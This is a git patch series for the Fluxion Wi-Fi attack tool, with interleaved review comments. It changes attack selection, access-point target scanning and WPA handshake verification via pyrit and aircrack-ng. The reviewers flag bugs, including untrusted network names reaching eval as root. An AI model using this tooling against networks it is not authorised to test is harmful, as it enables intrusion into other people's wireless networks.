fluxion_hash_unset_path() { + FluxionHashPath="" +} + +# Parameters: [channel [encryption [maker]]] +function fluxion_hash_set_path() { + if [ "$FluxionHashPath" ]; then return 0; fi + + fluxion_hash_unset_path + + local -r hashPath=$1 + + # If we've got a default path, check if a hash exists. + # If one exists, ask users if they'd like to use it. 
+ if [ "$hashPath" -a -f "$hashPath" -a -s "$hashPath" ]; then + local choices=( \ + "$FLUXIONUseFoundHashOption" \ + "$FLUXIONSpecifyHashPathOption" \ + "$FLUXIONHashSourceRescanOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" + echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" + echo + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONUseFoundHashOption") + FluxionHashPath=$hashPath + return ;; + + "$FLUXIONHashSourceRescanOption") + fluxion_hash_set_path "$hashPath" + return $? ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + + while [ ! "$FluxionHashPath" ]; do + fluxion_header + + echo + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileReturnTip" + echo + echo -ne "$FLUXIONAbsolutePathInfo: " + read FluxionHashPath + + # Back-track when the user leaves the hash path blank. + # Notice: Path is cleared if we return, no need to unset. + if [ ! "$FluxionHashPath" ]; then return -1; fi + + # Make sure the path points to a valid generic file. + if [ ! -f "$FluxionHashPath" -o ! -s "$FluxionHashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONEmptyOrNonExistentHashError" + sleep 5 + fluxion_hash_unset_path + fi + done +} + +# Paramters: +function fluxion_hash_get() { + # Assure we've got the bssid and the essid passed in. + if [ ${#@} -lt 2 ]; then return 1; fi + + if ! fluxion_hash_set_path "$1"; then return $?; fi + + # TODO: People are gonna bitch about this, I can already tell: + # "The back button isn't taking me back!" So yeah, fix this. + if ! fluxion_hash_verify "$@"; then return $?; fi + + # Copy to hash file to workspace for operations. 
+ cp "$APTargetHashPath" "$hashPath" +} + + +# ================== < Attack Subroutines > ================== # +function fluxion_unset_attack() { + FluxionAttack="" +} + +function fluxion_set_attack() { + if [ "$FluxionAttack" ]; then return 0; fi + + fluxion_unset_attack + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONAttackQuery" + echo + + fluxion_target_show + + local attacks + readarray -t attacks < <(ls -1 attacks) + + local descriptions + readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') + + local identifiers=() + + local attack + for attack in "${attacks[@]}"; do + local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" + if [ "$identifier" ]; then identifiers+=("$identifier") + else identifiers+=("$attack") + fi + done + + attacks+=("$FLUXIONGeneralExitOption") + identifiers+=("$FLUXIONGeneralExitOption") + descriptions+=("") + + io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] + + echo + + if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralExitOption" ]; then + fluxion_shutdown + fi + + FluxionAttack=${IOQueryFormatFields[0]} +} + +function fluxion_unprep_attack() { + if type -t unprep_attack &> /dev/null; then + unprep_attack + fi + + return 1 # Trigger another undo since prep isn't significant. +} + +function fluxion_prep_attack() { + local -r path="$FLUXIONPath/attacks/$FluxionAttack" + + if [ ! -x "$path/attack.sh" ]; then return 1; fi + if [ ! -x "$path/language/$FLUXIONLanguage.sh" ]; then return 2; fi + + # Load attack and its corresponding language file. + # Notice: If the attack is a targetted attack, sourcing + # will define the constant FLUXIONAttackTargetted. + source "$path/language/$FLUXIONLanguage.sh" + source "$path/attack.sh" + + if ! 
prep_attack "$@"; then + fluxion_unprep_attack + return 1 + fi +} + +function fluxion_run_attack() { + start_attack + + local choices=( \ + "$FLUXIONSelectAnotherAttackOption" \ + "$FLUXIONGeneralExitOption" \ + ) + + io_query_choice \ + "`io_dynamic_output $FLUXIONAttackInProgressNotice`" choices[@] + + echo + + # IOQueryChoice is a global, meaning, its value is volatile. + # We need to make sure to save the choice before it changes. + local choice="$IOQueryChoice" + + stop_attack + + if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then + fluxion_handle_exit + fi + + fluxion_unset_attack +} # ============================================================ # @@ -1041,7 +1313,7 @@ function fluxion_main() { while true # Fluxion's runtime-loop. do fluxion_do_sequence fluxion sequence[@] done - + fluxion_shutdown } diff --git a/lib/HashUtils.sh b/lib/HashUtils.sh index ab7fb9f..bfd9b2a 100755 --- a/lib/HashUtils.sh +++ b/lib/HashUtils.sh 
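Review bot: In `fluxion_hash_verify` the line `fluxion_show_ap_info` has no trailing backslash, so the call runs without arguments and the next line, starting with `"$hashESSID" \`, is executed as a command whose name is the network name. Add the continuation, `fluxion_show_ap_info \`, so the five values are passed as arguments. The same function then verifies `$APTargetSSID` and `$APTargetMAC` rather than its own `hashESSID` and `hashBSSID`, so the values it was given are never the ones checked. In `fluxion_hash_get`, `if ! fluxion_hash_set_path "$1"; then return $?; fi` returns 0 on failure because `$?` holds the status of the negated test; `fluxion_hash_set_path "$1" || return` keeps the original status, and the same pattern follows for `fluxion_hash_verify "$@"`.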
@@ -6,46 +6,45 @@ readonly HashUtilsVersion="1.0" HashOutputDevice="/dev/stdout" function hash_check_handshake() { - local handshakeVerifier=$1 - local handshakePath=$2 - local handshakeAPSSID=$3 - local handshakeAPMAC=$4 + local -r handshakeVerifier=$1 + local -r handshakePath=$2 + local -r handshakeAPSSID=$3 + local -r handshakeAPMAC=$4 - local analysis - local hashData + echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" > $HashOutputDevice - echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" >$HashOutputDevice + local analysis # Since it's being used in all relevant instances. case "$handshakeVerifier" in - "pyrit") - readarray analysis < <(pyrit -r "$handshakePath" analyze 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: pyrit seems to be broken!" >$HashOutputDevice + "pyrit") + readarray analysis < <(pyrit -r "$handshakePath" analyze 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: pyrit seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") + + if [ "$hashMeta" ]; then + local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') + local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") + else + echo "No valid hash meta was found for \"$handshakeAPSSID\"" > $HashOutputDevice + fi + ;; + "aircrack-ng") + readarray analysis < <(aircrack-ng "$handshakePath" 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: aircrack-ng seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") + ;; + *) + echo "Invalid verifier, quitting!" 
> $HashOutputDevice return 1 - fi - - local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") - - if [ "$hashMeta" ]; then - local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') - hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") - else - echo "No valid hash meta was found for \"$handshakeAPSSID\"" >$HashOutputDevice - fi - ;; - "aircrack-ng") - readarray analysis < <(aircrack-ng "$handshakePath" 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: aircrack-ng seems to be broken!" >$HashOutputDevice - return 1 - fi - - hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") - ;; - *) - echo "Invalid verifier, quitting!" - return 1 - ;; + ;; esac if [ -z "$hashData" ]; then @@ -53,18 +52,24 @@ function hash_check_handshake() { return 1 fi - local hashResult case "$handshakeVerifier" in - "pyrit") hashResult=$(echo "$hashData" | grep "good") ;; - "aircrack-ng") hashResult=$(echo "$hashData" | grep "(1 handshake)") ;; + "pyrit") + if echo "$hashData" | grep -qF "good"; then + local -r hashResult=1 + fi ;; + + "aircrack-ng") + if echo "$hashData" | grep -qE "\([0-9]+ handshake\)"; then + local -r hashResult=1 + fi ;; esac if [ -z "$hashResult" ]; then - echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="invalid" return 1 else - echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="valid" fi } From 2aefa3bb223bbfd8a334dd433384c908daac2913 Mon Sep 17 00:00:00 2001 
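Review bot: The `$? != 0` half of `[ "${#analysis[@]}" -eq 0 -o $? != 0 ]`, in both the pyrit and the aircrack-ng arm, cannot see the verifier's exit status: at that point `$?` is the status of `readarray`, and the status of a command run inside `< <(...)` is not propagated to it. A failing verifier is therefore only noticed when it prints nothing at all. Capturing the output first keeps the status, e.g. `output=$(pyrit -r "$handshakePath" analyze 2> "$HashOutputDevice") || return 1` followed by `readarray analysis <<< "$output"` (with `output` declared `local` on its own line so the assignment's status is not masked). Quoting `"$HashOutputDevice"` in the redirections and replacing `-o` with two `[ ... ] ||` tests would also remove the word-splitting and ambiguity that the current form allows.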
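Review bot: The aircrack-ng arm now accepts any count, so a line reading `(0 handshake)` satisfies `grep -qE "\([0-9]+ handshake\)"` and the capture is reported as valid, where the removed code required `(1 handshake)`. If the intent was only to allow counts above one, `grep -qE "\([1-9][0-9]* handshake\)"` keeps zero rejected; this assumes the tool prints a zero count for networks without a handshake, which is worth confirming against its output. `hashResult` is also declared (`local -r hashResult=1`) only inside the successful branches, so the later `[ -z "$hashResult" ]` depends on no variable of that name existing in a calling scope; a plain `local hashResult=""` before the `case` makes the check self-contained.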
From: Matias Barcenas Date: Mon, 8 Jan 2018 22:56:44 -0600 Subject: [PATCH 04/45] Mangling, interfaces, format, renaming, & fixes. Added identifier mangling to sequencing framework to prevent collisions. Added the redo to interfaces by taking a lambda rather than an array ref. Started correcting some issues with formatting to follow the style guide. Reidentified some subroutines, variables, & constants. Fixed some bugs with the currently implemented subroutines. Added some test subroutines. --- fluxion | 277 +++++++++++++++++++++++++++++++------------------ language/en.sh | 6 +- 2 files changed, 180 insertions(+), 103 deletions(-) diff --git a/fluxion b/fluxion index 5efebbe..c426ca6 100755 --- a/fluxion +++ b/fluxion @@ -76,7 +76,7 @@ source lib/HashUtils.sh # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # -if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") +if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi 
@@ -427,31 +427,34 @@ declare -rA FLUXIONUndoable=( \ ["start"]="stop" \ ) +# Yes, I know, the identifiers are fucking ugly. If only we had +# some type of mangling with bash identifiers, that'd be great. function fluxion_do() { if [ ${#@} -lt 2 ]; then return -1; fi - local -r namespace=$1 - local -r identifier=$2 + local -r __fluxion_do__namespace=$1 + local -r __fluxion_do__identifier=$2 - eval FXDLog_$namespace+=\("$identifier"\) - eval ${namespace}_$identifier "${@:3}" + eval FXDLog_$__fluxion_do__namespace+=\("$__fluxion_do__identifier"\) + eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}" return $? } function fluxion_undo() { if [ ${#@} -ne 1 ]; then return -1; fi - local -r namespace=$1 + local -r __fluxion_undo__namespace=$1 - eval local -r history=\("\${FXDLog_$namespace[@]}"\) + eval local -r __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) - local i - for (( i=${#history[@]}; i > 0; i-- )); do - local -r instruction=${history[i-1]} - local -r command=${instruction%%_*} - local -r identifier=${instruction#*_} - if eval ${namespace}_${FLUXIONUndoable["$command"]}_$identifier; then - eval FXDLog_$namespace=\("${history[@]::$i}"\) + local __fluxion_undo__i + for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ + __fluxion_undo__i > 0; __fluxion_undo__i-- )); do + local -r __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} + local -r __fluxion_undo__command=${__fluxion_undo__instruction%%_*} + local -r __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} + if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) return 0 fi done 
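Review bot: `fluxion_do` still runs `eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}"`, which makes the shell parse the forwarded arguments a second time, so an argument containing spaces, `;` or `$(...)` is split or executed instead of being passed through; the mangled local names do not change that. Calling the function by name needs no `eval`: `"${__fluxion_do__namespace}_${__fluxion_do__identifier}" "${@:3}"`. The `FXDLog_*` accesses here and in `fluxion_undo`, `fluxion_done` and `fluxion_done_reset` (next hunk) also interpolate the namespace into `eval`; a nameref (`local -n`, bash 4.3+) or a guard such as `[[ $1 =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]] || return 1` would bound what can reach it. `return -1` reaches callers as 255, which is worth stating in a comment if callers compare against it.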
@@ -460,14 +463,20 @@ function fluxion_undo() { } function fluxion_done() { - eval "FluxionDone=\${FXDLog_$namespace[-1]}" + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_done__namespace=$1 + + eval "FluxionDone=\${FXDLog_$__fluxion_done__namespace[-1]}" [ ! $FluxionDone ] && return 1 } function fluxion_done_reset() { if [ ${#@} -ne 1 ]; then return -1; fi - local -r namespace=$1 - eval FXDLog_$namespace=\(\) + + local -r __fluxion_done_reset__namespace=$1 + + eval FXDLog_$__fluxion_done_reset__namespace=\(\) } function fluxion_do_sequence() { 
@@ -745,71 +754,80 @@ function fluxion_allocate_interface() { # Reserve interfaces # as the key for the global FluxionInterfaces hash/map/dictionary. } +# Parameters: +# Note: The interfaces lambda must print an interface per line. +# ------------------------------------------------------------ # +# Return -1: Go back +# Return 1: Missing interfaces lambda identifier (not passed). function fluxion_get_interface() { - if [[ "$1" != *"[@]" ]]; then return 1; fi + if ! type -t "$1" &> /dev/null; then return 1; fi - local interfacesAvailable=("${!1}") - local interfacesAvailableInfo=() - local interfacesAvailableColor=() - local interfacesAvailableState=() + while true; do + local interfacesAvailable + readarray -t interfacesAvailable < <($1) + local interfacesAvailableInfo=() + local interfacesAvailableColor=() + local interfacesAvailableState=() - # Gather information from all available interfaces. - local interfaceCandidate - for interfaceCandidate in "${interfacesAvailable[@]}"; do - interface_chipset "$interfaceCandidate" - interfacesAvailableInfo+=("$InterfaceChipset") + # Gather information from all available interfaces. + local interfaceCandidate + for interfaceCandidate in "${interfacesAvailable[@]}"; do + interface_chipset "$interfaceCandidate" + interfacesAvailableInfo+=("$InterfaceChipset") - # If it has already been allocated, we can use it at will. - if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then - interfacesAvailableColor+=("$CGrn") - interfacesAvailableState+=("[*]") - else - interface_state "$interfaceCandidate" - - if [ "$InterfaceState" = "up" ]; then - interfacesAvailableColor+=("$CPrp") - interfacesAvailableState+=("[-]") + # If it has already been allocated, we can use it at will. 
+ if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then + interfacesAvailableColor+=("$CGrn") + interfacesAvailableState+=("[*]") else - interfacesAvailableColor+=("$CClr") - interfacesAvailableState+=("[+]") + interface_state "$interfaceCandidate" + + if [ "$InterfaceState" = "up" ]; then + interfacesAvailableColor+=("$CPrp") + interfacesAvailableState+=("[-]") + else + interfacesAvailableColor+=("$CClr") + interfacesAvailableState+=("[+]") + fi fi + done + + # If only one interface exists and it's not unavailable, choose it. + if [ "${#interfacesAvailable[@]}" -eq 1 -a \ + "${interfacesAvailableState[0]}" != "[-]" ]; then + FluxionGetInterfaceSelected="${interfacesAvailable[0]}" + FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + else + interfacesAvailable+=( \ + "$FLUXIONGeneralRepeatOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + interfacesAvailableColor+=( \ + "$CClr" \ + "$CClr" \ + ) + + format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + io_query_format_fields \ + "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ + interfacesAvailableColor[@] interfacesAvailable[@] \ + interfacesAvailableState[@] interfacesAvailableInfo[@] + + echo + + case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralRepeatOption") continue;; + "$FLUXIONGeneralBackOption") return -1;; + *) break;; + esac fi done - # If only one interface exists and it's not unavailable, choose it. 
- if [ "${#interfacesAvailable[@]}" -eq 1 -a \ - "${interfacesAvailableState[0]}" != "[-]" ]; then - FluxionGetInterfaceSelected="${interfacesAvailable[0]}" - FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" - FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" - else - interfacesAvailable+=( \ - "$FLUXIONGeneralRepeatOption" \ - "$FLUXIONGeneralBackOption" \ - ) - - interfacesAvailableColor+=( \ - "$CClr" \ - "$CClr" \ - ) - - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" - io_query_format_fields \ - "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ - interfacesAvailableColor[@] interfacesAvailable[@] \ - interfacesAvailableState[@] interfacesAvailableInfo[@] - - echo - - case "${IOQueryFormatFields[1]}" in - "$FLUXIONGeneralRepeatOption") return -2;; - "$FLUXIONGeneralBackOption") return -1;; - esac - - FluxionGetInterfaceSelected="${IOQueryFormatFields[1]}" - FluxionGetInterfaceSelectedState="${IOQueryFormatFields[2]}" - FluxionGetInterfaceSelectedInfo="${IOQueryFormatFields[3]}" - fi + FluxionInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" } @@ -820,7 +838,7 @@ function fluxion_get_interface() { # Return 2: Xterm failed to start airmon-ng. # Return 3: Invalid capture file was generated. # Return 4: No candidates were detected. -function fluxion_get_target_candidates() { +function fluxion_target_get_candidates() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi 
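Review bot: The auto-select branch (exactly one interface whose state is not `[-]`) never leaves the new `while true` loop: it has no `break` or `return`, so the function rescans indefinitely whenever only one usable interface exists. That branch also still assigns `FluxionGetInterfaceSelected*`, while the code after the loop fills `FluxionInterfaceSelected*` from `IOQueryFormatFields`, which the auto-select path presumably never populates. Assigning `FluxionInterfaceSelected`, `FluxionInterfaceSelectedState` and `FluxionInterfaceSelectedInfo` in that branch and ending it with `return 0` addresses both. `readarray -t interfacesAvailable < <($1)` runs the lambda name unquoted; `< <("$1")` avoids splitting or globbing on it.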
@@ -855,13 +873,13 @@ function fluxion_get_target_candidates() { # The times matching operator "{n}" isn't supported by mawk (alias awk). # readarray FLUXIONTargetCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) # readarray FLUXIONTargetCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray FLUXIONTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - readarray FLUXIONTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + readarray FluxionTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + readarray FluxionTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") # Cleanup the workspace to prevent potential bugs/conflicts. sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - if [ ${#FLUXIONTargetCandidates[@]} -eq 0 ]; then + if [ ${#FluxionTargetCandidates[@]} -eq 0 ]; then echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" sleep 3 return 4 @@ -873,6 +891,8 @@ function fluxion_get_target() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + local -r interface=$1 + local choices=( \ "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ "$FLUXIONScannerChannelOptionAll (5GHz)" \ 
@@ -886,13 +906,13 @@ function fluxion_get_target() { case "$IOQueryChoice" in "$FLUXIONScannerChannelOptionAll (2.4GHz)") - fluxion_get_target_candidates $interface "" "bg";; + fluxion_target_get_candidates $interface "" "bg";; "$FLUXIONScannerChannelOptionAll (5GHz)") - fluxion_get_target_candidates $interface "" "a";; + fluxion_target_get_candidates $interface "" "a";; "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") - fluxion_get_target_candidates $interface "" "abg";; + fluxion_target_get_candidates $interface "" "abg";; "$FLUXIONScannerChannelOptionSpecific") fluxion_header @@ -910,7 +930,7 @@ function fluxion_get_target() { echo - fluxion_get_target_candidates $interface $channels;; + fluxion_target_get_candidates $interface $channels;; "$FLUXIONGeneralBackOption") return -1;; 
@@ -931,22 +951,29 @@ function fluxion_get_target() { # Gather information from all the candidates detected. # TODO: Clean up this for loop using a cleaner algorithm. # Maybe try using array appending & [-1] for last elements. - for candidateAPInfo in "${candidates[@]}"; do + for candidateAPInfo in "${FluxionTargetCandidates[@]}"; do # Strip candidate info from any extraneous spaces after commas. candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") local i=${#candidatesMAC[@]} candidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) - candidatesClientsCount[i]=$(echo "${candidatesClients[@]}" | grep -c "${candidatesMAC[i]}") + candidatesClientsCount[i]=$( + echo "${FluxionTargetCandidatesClients[@]}" | + grep -c "${candidatesMAC[i]}" + ) candidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) candidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) candidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) - candidatesColor[i]=$([ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) + candidatesColor[i]=$( + [ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr + ) # Parse any non-ascii characters by letting bash handle them. # Just escape all single quotes in ESSID and let bash's $'...' handle it. - local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14) + local sanitizedESSID=$( + echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 + ) candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") local power=${candidatesPower[i]} 
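Review bot: The ESSID read from the scan CSV still ends up in `eval "echo \$'$sanitizedESSID'"` (the context line directly below the re-wrapped assignment), and network names are chosen by whoever operates a nearby access point, so this is untrusted input reaching `eval` in a script that the sanity checks require to run as root. Escaping only `'` is not a complete quoting scheme for `$'...'`. Decoding without `eval` removes the exposure, e.g. `printf -v 'candidatesESSID[i]' '%b' "$(echo "$candidateAPInfo" | cut -d , -f 14)"`, assuming the escapes present in the CSV are ones `%b` understands. The enclosing loop and function continue outside this hunk.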
@@ -983,15 +1010,17 @@ function fluxion_get_target() { echo - FLUXIONGetTargetMAC=${IOQueryFormatFields[7]} - FLUXIONGetTargetSSID=${IOQueryFormatFields[1]} - FLUXIONGetTargetChannel=${IOQueryFormatFields[5]} + FluxionTargetMAC=${IOQueryFormatFields[7]} + FluxionTargetSSID=${IOQueryFormatFields[1]} + FluxionTargetChannel=${IOQueryFormatFields[5]} - FLUXIONGetTargetEncryption=${IOQueryFormatFields[6]} + FluxionTargetEncryption=${IOQueryFormatFields[6]} - FLUXIONGetTargetMakerID=${APTargetMAC:0:8} - FLUXIONGetTargetMaker=$( - macchanger -l | grep ${FLUXIONGetTargetMakerID,,} | cut -d ' ' -f 5- + FluxionTargetMakerID=${FluxionTargetMAC:0:8} + FluxionTargetMaker=$( + macchanger -l | + grep ${FluxionTargetMakerID,,} 2> $FLUXIONOutputDevice | + cut -d ' ' -f 5- ) # Sanitize network ESSID to make it safe for manipulation. @@ -1015,9 +1044,9 @@ function fluxion_target_show() { local colorlessFormat="$FormatApplyAutosize" local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') - printf "$colorlessFormat" "" "ESSID" "\"${FLUXIONGetTargetSSID:-[N/A]}\" / ${FLUXIONGetTargetEncryption:-[N/A]}" "" - printf "$colorlessFormat" "" "Channel" "${FLUXIONGetTargetChannel:-[N/A]}" "" - printf "$colorfullFormat" "" "BSSID" "${FLUXIONGetTargetMAC:-[N/A]} ($CYel${FLUXIONGetTargetMaker:-[N/A]}$CClr)" "" + printf "$colorlessFormat" "" "ESSID" "\"${FluxionTargetSSID:-[N/A]}\" / ${FluxionTargetEncryption:-[N/A]}" "" + printf "$colorlessFormat" "" "Channel" " ${FluxionTargetChannel:-[N/A]}" "" + printf "$colorfullFormat" "" "BSSID" " ${FluxionTargetMAC:-[N/A]} ($CYel${FluxionTargetMaker:-[N/A]}$CClr)" "" echo } 
@@ -1172,14 +1201,15 @@ function fluxion_hash_get() { # Assure we've got the bssid and the essid passed in. if [ ${#@} -lt 2 ]; then return 1; fi - if ! fluxion_hash_set_path "$1"; then return $?; fi + while true; do + if ! fluxion_hash_set_path "$1"; then return $?; fi - # TODO: People are gonna bitch about this, I can already tell: - # "The back button isn't taking me back!" So yeah, fix this. - if ! fluxion_hash_verify "$@"; then return $?; fi + if fluxion_hash_verify "$FluxionHashPath" "${@:1}"; then + break; + fi + done - # Copy to hash file to workspace for operations. - cp "$APTargetHashPath" "$hashPath" + # At this point FluxionHashPath will be set and ready. } @@ -1225,7 +1255,7 @@ function fluxion_set_attack() { echo if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralExitOption" ]; then - fluxion_shutdown + fluxion_shutdown; exit fi FluxionAttack=${IOQueryFormatFields[0]} @@ -1284,6 +1314,19 @@ function fluxion_run_attack() { } +# ============================================================ # +# =================== < Test Subroutines > =================== # +# ============================================================ # +function subtest1() { + local interface + interface_list_all + for interface in "${InterfaceListAll[@]}"; do + echo "$interface" + done +} + + + # ============================================================ # # ================= < Argument Executables > ================= # # ============================================================ # 
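Review bot: `if ! fluxion_hash_set_path "$1"; then return $?; fi` returns 0 when `fluxion_hash_set_path` fails, because inside the `then` branch `$?` holds the status of the negated test rather than of the function. With the new `while true` loop this means a failed or cancelled path prompt is reported to the caller as success, with `FluxionHashPath` possibly unset. `fluxion_hash_set_path "$1" || return` propagates the real status. `"${@:1}"` is identical to `"$@"`, so `fluxion_hash_verify` receives the hash path followed by every original argument including `$1`; if the first argument was meant to be dropped this should be `"${@:2}"`. The `--test` arm added further down in this patch prints `$?` after `if !` in the same way.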
@@ -1292,6 +1335,36 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. while [ "$1" != "--" ]; do case "$1" in -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; + --test) + while true; do + if ! fluxion_get_interface subtest1; then + echo Failed to get interface with code $? + exit + fi + + if ! fluxion_allocate_interface "$FluxionInterfaceSelected"; then + echo Failed to allocate "$FluxionInterfaceSelected" with code $? + exit + else + interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} + + echo "Allocated $FluxionInterfaceSelected -> $interfaceA" + fi + + fluxion_get_target $interfaceA + result=$? + if [ $result -ne 0 ]; then + echo Failed to get target with code $result + exit + fi + + if ! fluxion_target_show; then + echo Failed to show target with code $? + exit + fi + done + exit + ;; esac shift # Shift new parameters done diff --git a/language/en.sh b/language/en.sh index aa64840..a3e6c83 100755 --- a/language/en.sh +++ b/language/en.sh @@ -31,8 +31,10 @@ FLUXIONScannerDetectedNothingNotice="No access points were detected, returning.. FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" 